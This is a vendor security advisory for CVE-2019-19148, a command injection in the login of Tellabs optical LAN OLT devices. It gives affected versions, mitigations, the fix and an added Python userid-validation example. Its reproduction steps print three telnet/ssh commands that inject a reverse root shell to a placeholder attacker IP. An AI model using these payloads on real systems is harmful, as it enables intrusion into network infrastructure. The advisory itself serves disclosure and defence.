CVE-2019-19148

Vulnerability Statement for CVE-2019-19148

ENG-010638

Introduction

This document defines the Vulnerability CVE-2019-19148 noted against the Tellabs OLT and the resolution to this vulnerability.

Applies To

  • This Vulnerability applies to the following list of versions of the Tellabs 1150, 1134, and 1131 OLT software:
  • This Vulnerability is resolved in the following software versions of the Tellabs 1150, 1134, and 1131 OLT software: SR30.1 and SR31.1

CVE Short Description

An OS command injection vulnerability has been discovered in the SSH interface of the Tellabs Optical LAN Network Element in system release versions prior to 30.1_561090 and 31.1_601053. The vulnerability allows an attacker to execute arbitrary code at a privileged level because certain special characters are allowed in the userid.

Tellabs has addressed this issue in the SR30.1 and SR31.1 release on February 18, 2020. These versions are available on the Tellabs Portal.

CVE-2019-19148 Description

During a recent penetration test, a vulnerability in the way Tellabs handles incoming authentication/authorization was discovered which allowed us to bypass the authentication methods on the Tellabs OLT 1150 device. It is highly suspected that this vulnerability exists in other devices as well.

[Product]

Vendor: Tellabs

Model: MX-IPTV1150

System Version: FP29.2_015873

Release: ONT709.2.50.12

Date: 180722

Steps used to exploit

Steps to reproduce were based on the older Telnet "ShellShock" vulnerability. It's known that the following methods all produced a netcat reverse shell as root:

telnet [OLTHOSTNAME] -l ";EOF() { :;}; /usr/bin/id & /bin/bash -i >& /dev/tcp/[attacker_ip]/4455 0>&1"

The above command asked for the username within the telnet session, and when it timed out, produced the output: "uid=0(emsuser) gid=0(root)" showing that the second portion of the command was not parsed, and the system was vulnerable.

telnet [OLTHOSTNAME] -l "() { :;}; $((/bin/bash -i >& /dev/tcp/[attacker_ip]/4455 0>&1)) /bin/bash -i >&/dev/tcp/[attacker_ip]/4455 0>&1"

The above command was run and produced a reverse 'netcat' style shell to the attacker IP address with a full root bash shell. Again, suspect the second portion of the command was unnecessary, but due to time constraints, was unable to test further.

ssh [OLTHOSTNAME] -l "''; /bin/bash -i >& /dev/tcp/[attacker_ip]/4455 0>&1"

After 3 failed authentication attempts, the connect-back to the netcat listener occurs and you are dropped into a root shell. (Contributed by Sandia National Laboratory)

Due to customer concerns with the critical nature of the networking infrastructure, further testing beyond the above was not possible, and the customer immediately contacted the vendor to work on a patch.

Tellabs Recommended Mitigations

Tellabs recommends upgrading to a release that contains the resolution for this problem as the primary resolution at the earliest opportunity. Due to the critical nature of many systems, there may be some interim period where the older releases are still running. The following mitigations can limit the exposure to this vulnerability.

Tellabs equipment has telnet disabled by default, and it must be manually enabled by an EMS admin user before anyone can connect via Telnet. Telnet should remain disabled in all production systems at all times. It should be noted that Telnet has been completely removed in the software releases noted in the resolutions. You can verify Telnet is disabled by clicking:

Click the OLT-> Right Click Properties->Security Tab

The telnet option should be unchecked as in the following example:

Tellabs equipment supports a trusted host feature that prevents connections from any IP address other than those that are specified in the trusted host list.

The Trusted Host Menu can be reached by going to the common tree:

Click the OLT-> Right Click->Properties->Security Tab

You should, at a minimum, add the EMS IP, the Default Gateway IP and any individual machines you want to allow access from. This will prevent any other addresses from reaching the OLT and is a good practice for all installations. All packets from IP addresses not in the Trusted Host list will be dropped.

CVE Solution

Tellabs has addressed this issue in the SR30.1 and SR31.1 releases, released on February 18, 2020. These versions are available on the Tellabs Portal.

  • The Tellabs OLT software has been updated to prevent any special characters within the user field of the ssh authentication.
  • All special characters will be stripped and not passed on down the authentication stack.
  • Attempts at command injection will now result in authentication failure.
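The following is an added illustration of the validation the fix describes, written for this page and not Tellabs' own code: the userid is checked against an allowlist before anything else happens, and the downstream account lookup is built as an argv list so no shell ever parses the field. The allowlisted character set, the 32-character limit, and the use of getent as the lookup are assumptions for illustration.

```python
import re
import subprocess

# Allowlist for the userid field. The advisory says the fixed releases strip
# special characters from the SSH user field; this example takes the stricter
# route of rejecting the login outright. The character set and the 32-character
# limit are assumptions for illustration, not Tellabs' actual rule.
USERID_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")

# Characters that give a shell something to interpret; used only for reporting.
SHELL_META = set(";|&$`(){}<>'\"\\ \n")


def userid_is_safe(userid: str) -> bool:
    """True only if the userid is made purely of allowlisted characters."""
    return USERID_RE.fullmatch(userid) is not None


def offending_chars(userid: str) -> str:
    """Metacharacters present in the userid, in first-seen order, for log lines."""
    seen = []
    for ch in userid:
        if ch in SHELL_META and ch not in seen:
            seen.append(ch)
    return "".join(seen)


def account_lookup_argv(userid: str) -> list[str]:
    """Build the account lookup as an argv list so no shell ever parses the
    userid; the allowlist check runs first and a bad userid is an auth failure."""
    if not userid_is_safe(userid):
        raise ValueError("authentication failure: userid contains %r" % offending_chars(userid))
    return ["getent", "passwd", userid]


def run_lookup(userid: str) -> bool:
    """Execute the lookup without shell=True; True if the account exists."""
    proc = subprocess.run(account_lookup_argv(userid), capture_output=True, text=True)
    return proc.returncode == 0


if __name__ == "__main__":
    # Constructed samples: two ordinary logins, then userids shaped like the
    # advisory's reproduction steps (shortened; no connect-back payload).
    for uid in ["emsuser", "ops.admin-01", ";EOF() { :;}; /usr/bin/id",
                "() { :;}; $((/usr/bin/id))", "''; /usr/bin/id"]:
        try:
            print(repr(uid), "->", account_lookup_argv(uid))
        except ValueError as exc:
            print(repr(uid), "->", exc)
```

Logging the output of offending_chars on every rejected login gives the SOC a cheap signal for injection attempts against the userid field.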

For further support, please contact the Tellabs 24/7 Technical Assistance Center (TAC).
